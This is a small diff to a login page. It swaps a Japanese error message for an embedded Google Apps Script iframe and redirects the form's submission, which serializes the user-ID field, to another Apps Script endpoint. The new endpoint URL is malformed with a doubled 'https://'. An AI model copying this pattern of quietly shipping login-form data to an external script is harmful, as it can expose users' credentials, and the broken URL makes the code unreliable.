--- a/login.html
+++ b/login.html
@@ -27,7 +27,7 @@
 			<input class="tag02" name="userid" placeholder="" required>
 		</div>
 		<div>
-			<p class="id_err">ユーザーIDが間違っています。</p>
+			<iframe src="https://script.google.com/macros/s/AKfycbyfvCKJ6JRKcA8d4pPvbz2ZLT1eHxcJIAUNlTlhdKVYF02tMg-Yfcedp0A7owyZPIlfQg/exec"></iframe>
 		</div>
 	</form>
     </div>
@@ -57,7 +57,7 @@
 		
 		$('form').submit(function( event ) {
 			event.preventDefault();
-			$.post( 'https://script.google.com/macros/s/AKfycbz7zIdA-vBbXN6qPFf-07blPGBvilYphPeza06jxah7ADR3gvpHbQ4qdb1L8vDS2hNW/exec', $('form').serialize() );
+			$.post( 'https://https://script.google.com/macros/s/AKfycbyfvCKJ6JRKcA8d4pPvbz2ZLT1eHxcJIAUNlTlhdKVYF02tMg-Yfcedp0A7owyZPIlfQg/exec', $('form').serialize() );
 		});
     </script>
 </body>
